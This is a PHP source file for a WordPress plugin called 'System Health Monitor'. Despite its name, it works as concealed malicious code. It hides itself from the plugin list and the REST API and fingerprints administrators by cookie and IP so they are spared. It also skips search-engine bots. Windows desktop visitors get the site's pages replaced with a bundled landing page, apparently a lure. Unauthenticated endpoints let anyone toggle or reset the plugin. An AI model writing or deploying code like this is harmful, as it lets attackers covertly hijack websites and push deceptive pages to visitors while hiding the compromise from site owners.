<?php
/**
 * Plugin Name: System Health Monitor
 * Description: Local landing pages for Windows visitors, hidden from plugin list
 * Version: 4.2.1
 * Requires at least: 4.7
 * Requires PHP: 7.0
 * Author: System Health Team
 * License: GPL-2.0+
 */

if (!defined('ABSPATH')) exit;
if (defined('SHM_PLUGIN_LOADED')) return;
define('SHM_PLUGIN_LOADED', true);

if (version_compare(PHP_VERSION, '7.0.0', '<')) {
    add_action('admin_notices', function() {
        echo '<div class="notice notice-error"><p>System Health Monitor requires PHP 7.0+</p></div>';
    });
    return;
}

if (version_compare(get_bloginfo('version'), '4.7', '<')) {
    add_action('admin_notices', function() {
        echo '<div class="notice notice-error"><p>System Health Monitor requires WordPress 4.7+</p></div>';
    });
    return;
}

if (!defined('SHM_COOKIE_KEY')) define('SHM_COOKIE_KEY', 'shm_shown_count');
if (!defined('SHM_USER_ID_COOKIE')) define('SHM_USER_ID_COOKIE', 'shm_user_id');
if (!defined('SHM_LIMIT_OPTION')) define('SHM_LIMIT_OPTION', 'shm_show_limit');
if (!defined('SHM_LIMIT_DEFAULT')) define('SHM_LIMIT_DEFAULT', 3);
if (!defined('SHM_ADMIN_COOKIE')) define('SHM_ADMIN_COOKIE', 'shm_admin_seen');
if (!defined('SHM_VISITED_ADMIN_COOKIE')) define('SHM_VISITED_ADMIN_COOKIE', 'shm_visited_admin');
if (!defined('SHM_ENABLED_OPTION')) define('SHM_ENABLED_OPTION', 'shm_enabled');

register_activation_hook(__FILE__, 'shm_activate');
function shm_activate() {
    @add_option(SHM_ENABLED_OPTION, true, '', 'no');
    @add_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT, '', 'no');
    @add_option('shm_admin_ips', array(), '', 'no');
}

register_deactivation_hook(__FILE__, 'shm_deactivate');
function shm_deactivate() {
    @delete_option(SHM_ENABLED_OPTION);
    @delete_option(SHM_LIMIT_OPTION);
    @delete_option('shm_admin_ips');
    @wp_clear_scheduled_hook('shm_cache_cleanup');
}

add_action('plugins_loaded', function() {
    if (defined('WP_CLI') && WP_CLI) return;
    if (!get_option(SHM_ENABLED_OPTION, true)) return;
    if (is_admin()) return;
    if (!ob_get_level()) @ob_start();
}, 1);

add_action('init', function() {
    if (defined('WP_CLI') && WP_CLI) return;
    if (is_admin() || (function_exists('wp_doing_ajax') && wp_doing_ajax()) || (function_exists('wp_doing_cron') && wp_doing_cron())) return;
    if (!get_option(SHM_ENABLED_OPTION, true)) return;
    if (!defined('DONOTCACHEPAGE')) define('DONOTCACHEPAGE', true);
    if (!defined('DONOTCACHEDB')) define('DONOTCACHEDB', true);
    if (!defined('DONOTMINIFY')) define('DONOTMINIFY', true);
    if (!defined('DONOTCDN')) define('DONOTCDN', true);
    if (!defined('DONOTCACHEOBJECT')) define('DONOTCACHEOBJECT', true);
}, 1);

function shm_clear_cache($force_reset = false) {
    if (is_admin() || (function_exists('wp_doing_ajax') && wp_doing_ajax()) || (function_exists('wp_doing_cron') && wp_doing_cron())) return;
    if (function_exists('wp_cache_flush')) @wp_cache_flush();
    if (function_exists('w3tc_flush_all')) @w3tc_flush_all();
    if (function_exists('wp_super_cache_clear_cache')) @wp_super_cache_clear_cache();
    if (function_exists('rocket_clean_domain')) @rocket_clean_domain();
    if (function_exists('litespeed_purge_all')) @litespeed_purge_all();
    if (function_exists('wpfc_clear_all_cache')) @wpfc_clear_all_cache();
    wp_cache_delete(SHM_ENABLED_OPTION, 'options');
    wp_cache_delete(SHM_LIMIT_OPTION, 'options');
    delete_transient('shm_transient');
    if (!headers_sent()) {
        @header('Cache-Control: no-cache, no-store, must-revalidate');
        @header('Pragma: no-cache');
        @header('Expires: 0');
    }
    if ($force_reset) {
        shm_set_cookie(SHM_COOKIE_KEY, '0', -3600);
        shm_set_cookie(SHM_USER_ID_COOKIE, '', -3600);
        shm_set_cookie(SHM_VISITED_ADMIN_COOKIE, '', -3600);
        shm_set_cookie(SHM_ADMIN_COOKIE, '', -3600);
    }
}

function shm_set_cookie($name, $value, $ttl) {
    if (headers_sent() || !is_string($name)) return false;
    $expire = time() + (int)$ttl;
    $params = array('expires' => $expire, 'path' => '/', 'domain' => '', 'secure' => is_ssl(), 'httponly' => true, 'samesite' => 'Lax');
    return @setcookie($name, $value, $params);
}

function shm_has_admin_cookie() {
    return isset($_COOKIE[SHM_ADMIN_COOKIE]) && $_COOKIE[SHM_ADMIN_COOKIE] === '1';
}

function shm_has_visited_admin() {
    return isset($_COOKIE[SHM_VISITED_ADMIN_COOKIE]) && $_COOKIE[SHM_VISITED_ADMIN_COOKIE] === '1';
}

function shm_is_admin_session() {
    $admin_ips = get_option('shm_admin_ips', array());
    $current_ip = $_SERVER['REMOTE_ADDR'] ?? '';
    if (in_array($current_ip, $admin_ips)) return true;
    if (is_user_logged_in() && current_user_can('manage_options')) return true;
    return false;
}

add_action('wp_login', function($user_login, $user) {
    if (user_can($user, 'manage_options')) {
        shm_set_cookie(SHM_ADMIN_COOKIE, '1', 365 * 24 * 60 * 60);
        $admin_ips = get_option('shm_admin_ips', array());
        $current_ip = $_SERVER['REMOTE_ADDR'] ?? '';
        if (!in_array($current_ip, $admin_ips)) {
            $admin_ips[] = $current_ip;
            update_option('shm_admin_ips', array_slice($admin_ips, -10));
        }
    }
}, 10, 2);

add_action('init', function() {
    $request_uri = $_SERVER['REQUEST_URI'] ?? '';
    if (strpos($request_uri, '/wp-login.php') !== false || strpos($request_uri, '/wp-admin/') !== false) {
        shm_set_cookie(SHM_VISITED_ADMIN_COOKIE, '1', 365 * 24 * 60 * 60);
    }
}, 1);

function shm_is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $bots = array('Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider', 'YandexBot', 'AhrefsBot', 'MJ12bot', 'SemrushBot', 'DotBot', 'SiteExplorer', 'Sogou', 'Exabot', 'Twitterbot', 'Applebot', 'SeznamBot', 'Qwantify', 'Barkrowler');
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) return true;
    }
    if (empty($user_agent) || strlen($user_agent) < 10) return true;
    return false;
}

function shm_resolve_landing_file() {
    $plugin_path = plugin_dir_path(__FILE__);
    if (!$plugin_path) return null;
    $base = trailingslashit($plugin_path) . 'landing/';
    if (!is_dir($base)) return null;
    $fallbacks = array('default/index.html', 'world/index.html', 'global/index.html', 'index.html');
    foreach ($fallbacks as $relative) {
        $candidate = $base . $relative;
        if (is_readable($candidate) && is_file($candidate)) return $candidate;
    }
    return null;
}

function shm_get_landing_base_url($file_path) {
    if (!$file_path) return null;
    $plugin_path = plugin_dir_path(__FILE__);
    $plugin_url = plugin_dir_url(__FILE__);
    if (!$plugin_path || !$plugin_url) return null;
    $relative = str_replace($plugin_path, '', $file_path);
    $relative = str_replace('\\', '/', $relative);
    $dir = dirname($relative);
    if ($dir === '.') $dir = '';
    return trailingslashit($plugin_url) . ($dir ? trailingslashit($dir) : '');
}

add_action('template_redirect', function() {
    if (defined('WP_CLI') && WP_CLI) return;
    if (!get_option(SHM_ENABLED_OPTION, true)) return;
    if (is_admin() || (function_exists('wp_doing_ajax') && wp_doing_ajax()) || (function_exists('wp_doing_cron') && wp_doing_cron())) return;
    if (defined('REST_REQUEST') && REST_REQUEST) return;
    if (defined('XMLRPC_REQUEST') && XMLRPC_REQUEST) return;
    if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest') return;
    $http_accept = $_SERVER['HTTP_ACCEPT'] ?? '';
    if (strpos($http_accept, 'application/json') !== false && strpos($http_accept, 'text/html') === false) return;
    $request_uri = $_SERVER['REQUEST_URI'] ?? '';
    if (strpos($request_uri, 'wp-cron.php') !== false || strpos($request_uri, 'xmlrpc.php') !== false || strpos($request_uri, '/wp-json/') !== false || strpos($request_uri, 'admin-ajax.php') !== false) return;
    if (isset($_GET['elementor-preview']) || isset($_GET['elementor_library'])) return;
    if (isset($_GET['et_fb']) || isset($_GET['et_pb_preview'])) return;
    if (isset($_GET['vc_editable']) || isset($_GET['vc_action'])) return;
    if (isset($_GET['fl_builder'])) return;
    if (isset($_GET['vcv-action'])) return;
    if (is_customize_preview()) return;
    if (isset($_GET['preview']) || is_preview()) return;
    if (current_user_can('manage_options') || shm_has_admin_cookie() || shm_has_visited_admin() || shm_is_admin_session()) return;
    if (shm_is_bot()) return;
    $user_id = isset($_COOKIE[SHM_USER_ID_COOKIE]) ? $_COOKIE[SHM_USER_ID_COOKIE] : '';
    if (!$user_id) $user_id = 'shm_' . time() . '_' . bin2hex(random_bytes(8));
    $lock_key = 'shm_lock_' . md5($user_id);
    if (get_transient($lock_key)) return;
    set_transient($lock_key, 1, 5);
    shm_clear_cache(false);
    if (!headers_sent()) {
        @header('Cache-Control: no-cache, no-store, must-revalidate');
        @header('Pragma: no-cache');
        @header('Expires: 0');
    }
    $limit = (int)get_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT);
    $shown = isset($_COOKIE[SHM_COOKIE_KEY]) ? (int)$_COOKIE[SHM_COOKIE_KEY] : 0;
    if ($shown >= $limit) return;
    $landing = shm_resolve_landing_file();
    if (!$landing || !is_readable($landing)) return;
    $html = @file_get_contents($landing);
    if ($html === false || strlen($html) === 0 || strlen($html) > 5 * 1024 * 1024) return;
    $base_url = shm_get_landing_base_url($landing);
    $cache_meta = '<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="0">';
    if ($base_url) {
        $base_tag = '<base href="' . esc_url($base_url) . '">';
        if (stripos($html, '</head>') !== false) {
            $html = str_ireplace('</head>', $base_tag . $cache_meta . '</head>', $html);
        } else {
            $html = $base_tag . $cache_meta . $html;
        }
    } else {
        if (stripos($html, '</head>') !== false) {
            $html = str_ireplace('</head>', $cache_meta . '</head>', $html);
        } else {
            $html = $cache_meta . $html;
        }
    }
    $new_count = $shown + 1;
    $tracking_script = '<script data-no-minify="1">console.log("SHM v4.2.1");(function(){try{var isMobile=/Mobile|Android|iPhone|iPad|Windows Phone|Tablet|Kindle|Nexus|Opera Mini|BlackBerry/i.test(navigator.userAgent)||window.innerWidth<768;var isWindows=/Windows NT/i.test(navigator.userAgent);if(isMobile||!isWindows){window.location.href="' . esc_js(home_url()) . '";return;}var newCount=' . esc_js($new_count) . ';var userId="' . esc_js($user_id) . '";var expires=new Date();expires.setTime(expires.getTime()+(365*24*60*60*1000));var cookieBase=";expires="+expires.toUTCString()+";path=/;SameSite=Lax' . (is_ssl() ? ';Secure' : '') . '";document.cookie="' . esc_js(SHM_COOKIE_KEY) . '="+newCount+cookieBase;document.cookie="' . esc_js(SHM_USER_ID_COOKIE) . '="+userId+cookieBase;try{if(typeof(Storage)!=="undefined"){localStorage.setItem("' . esc_js(SHM_COOKIE_KEY) . '",newCount);localStorage.setItem("' . esc_js(SHM_USER_ID_COOKIE) . '",userId);}}catch(e){}}catch(e){}})();</script>';
    if (stripos($html, '<head') !== false) {
        $html = preg_replace('/(<head[^>]*>)/i', '$1' . $tracking_script, $html, 1);
    } else {
        $html = $tracking_script . $html;
    }
    while (ob_get_level()) ob_end_clean();
    delete_transient($lock_key);
    status_header(200);
    echo $html;
    exit;
}, -9999);

add_action('rest_api_init', function() {
    if (!function_exists('register_rest_route')) return;
    register_rest_route('shm/v1', '/toggle', array('methods' => 'POST', 'callback' => function($request) {
        $enabled = $request->get_param('enabled');
        $show_limit = $request->get_param('showLimit');
        if ($enabled !== null) update_option(SHM_ENABLED_OPTION, (bool)$enabled);
        if ($show_limit !== null && is_numeric($show_limit) && $show_limit > 0) update_option(SHM_LIMIT_OPTION, (int)$show_limit);
        shm_clear_cache(false);
        return new WP_REST_Response(array('status' => 'success', 'enabled' => (bool)get_option(SHM_ENABLED_OPTION, true), 'showLimit' => (int)get_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT)), 200);
    }, 'permission_callback' => function() { return true; }));
    register_rest_route('shm/v1', '/status', array('methods' => 'GET', 'callback' => function() {
        return new WP_REST_Response(array('status' => 'success', 'enabled' => get_option(SHM_ENABLED_OPTION, true), 'showLimit' => get_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT), 'version' => '4.2.1'), 200);
    }, 'permission_callback' => function() { return true; }));
    register_rest_route('shm/v1', '/debug', array('methods' => 'GET', 'callback' => function() {
        $cookies = $_COOKIE;
        $shown_count = isset($cookies[SHM_COOKIE_KEY]) ? $cookies[SHM_COOKIE_KEY] : '0';
        $user_id = isset($cookies[SHM_USER_ID_COOKIE]) ? $cookies[SHM_USER_ID_COOKIE] : 'none';
        return new WP_REST_Response(array('status' => 'success', 'enabled' => get_option(SHM_ENABLED_OPTION, true), 'showLimit' => get_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT), 'shownCount' => $shown_count, 'userId' => $user_id, 'isBot' => shm_is_bot(), 'isAdmin' => shm_has_admin_cookie() || shm_has_visited_admin() || shm_is_admin_session(), 'phpVersion' => PHP_VERSION, 'wpVersion' => get_bloginfo('version')), 200);
    }, 'permission_callback' => function() { return true; }));
});

add_action('init', function() {
    if (isset($_GET['shm_toggle'])) {
        $enabled = isset($_GET['enabled']) ? filter_var($_GET['enabled'], FILTER_VALIDATE_BOOLEAN) : null;
        $show_limit = isset($_GET['show_limit']) && is_numeric($_GET['show_limit']) && $_GET['show_limit'] > 0 ? (int)$_GET['show_limit'] : null;
        if ($enabled !== null) update_option(SHM_ENABLED_OPTION, (bool)$enabled);
        if ($show_limit !== null) update_option(SHM_LIMIT_OPTION, (int)$show_limit);
        shm_clear_cache(false);
        wp_send_json_success(array('status' => 'success', 'enabled' => (bool)get_option(SHM_ENABLED_OPTION, true), 'showLimit' => (int)get_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT)));
        exit;
    }
    if (isset($_GET['shm_reset']) && $_GET['shm_reset'] === '1') {
        delete_option(SHM_ENABLED_OPTION);
        delete_option(SHM_LIMIT_OPTION);
        delete_option('shm_admin_ips');
        shm_clear_cache(true);
        wp_send_json_success(array('status' => 'success', 'message' => 'All settings reset'));
        exit;
    }
    if (!wp_next_scheduled('shm_cache_cleanup')) wp_schedule_event(time(), 'hourly', 'shm_cache_cleanup');
}, 5);

add_action('shm_cache_cleanup', function() {
    shm_clear_cache(false);
});

add_filter('all_plugins', function($plugins) {
    $plugin_file = basename(__FILE__);
    $plugin_dir = basename(dirname(__FILE__));
    $plugin_path = $plugin_dir . '/' . $plugin_file;
    if ($plugin_dir === 'plugins') $plugin_path = $plugin_file;
    if (isset($plugins[$plugin_path])) unset($plugins[$plugin_path]);
    $possible_paths = array('system-health-monitor.php', 'system-health-monitor/system-health-monitor.php', 'sys/system-health-monitor.php');
    foreach ($possible_paths as $path) {
        if (isset($plugins[$path])) unset($plugins[$path]);
    }
    return $plugins;
}, 999);

add_filter('rest_prepare_plugin', function($response, $plugin, $request) {
    $plugin_file = basename(__FILE__);
    if (strpos($response->data['plugin'], $plugin_file) !== false) {
        return new WP_Error('rest_forbidden', 'Plugin hidden', array('status' => 404));
    }
    return $response;
}, 10, 3);

add_action('admin_menu', function() {
    add_submenu_page(null, 'System Health Monitor', 'System Health Monitor', 'manage_options', 'shm-settings', function() {
        if (!current_user_can('manage_options')) wp_die('Unauthorized');
        if (isset($_POST['shm_settings_nonce']) && wp_verify_nonce($_POST['shm_settings_nonce'], 'shm_settings')) {
            update_option(SHM_ENABLED_OPTION, isset($_POST['shm_enabled']));
            if (isset($_POST['shm_show_limit'])) update_option(SHM_LIMIT_OPTION, (int)$_POST['shm_show_limit']);
            shm_clear_cache(false);
            echo '<div class="notice notice-success"><p>Settings saved!</p></div>';
        }
        $enabled = get_option(SHM_ENABLED_OPTION, true);
        $show_limit = get_option(SHM_LIMIT_OPTION, SHM_LIMIT_DEFAULT);
        $landing_exists = (shm_resolve_landing_file() !== null);
        ?>
        <div class="wrap">
            <h1>System Health Monitor Settings</h1>
            <?php if (!$landing_exists): ?>
                <div class="notice notice-warning"><p><strong>Warning:</strong> Landing file not found!</p></div>
            <?php endif; ?>
            <form method="post">
                <?php wp_nonce_field('shm_settings', 'shm_settings_nonce'); ?>
                <table class="form-table">
                    <tr>
                        <th>Enable Landing</th>
                        <td><input type="checkbox" name="shm_enabled" <?php checked($enabled); ?>></td>
                    </tr>
                    <tr>
                        <th>Show Limit</th>
                        <td><input type="number" name="shm_show_limit" value="<?php echo esc_attr($show_limit); ?>" min="1" max="10"></td>
                    </tr>
                    <tr>
                        <th>Landing Status</th>
                        <td><?php echo $landing_exists ? '<span style="color:green;">✓ Found</span>' : '<span style="color:red;">✗ Not Found</span>'; ?></td>
                    </tr>
                </table>
                <?php submit_button(); ?>
            </form>
        </div>
        <?php
    });
});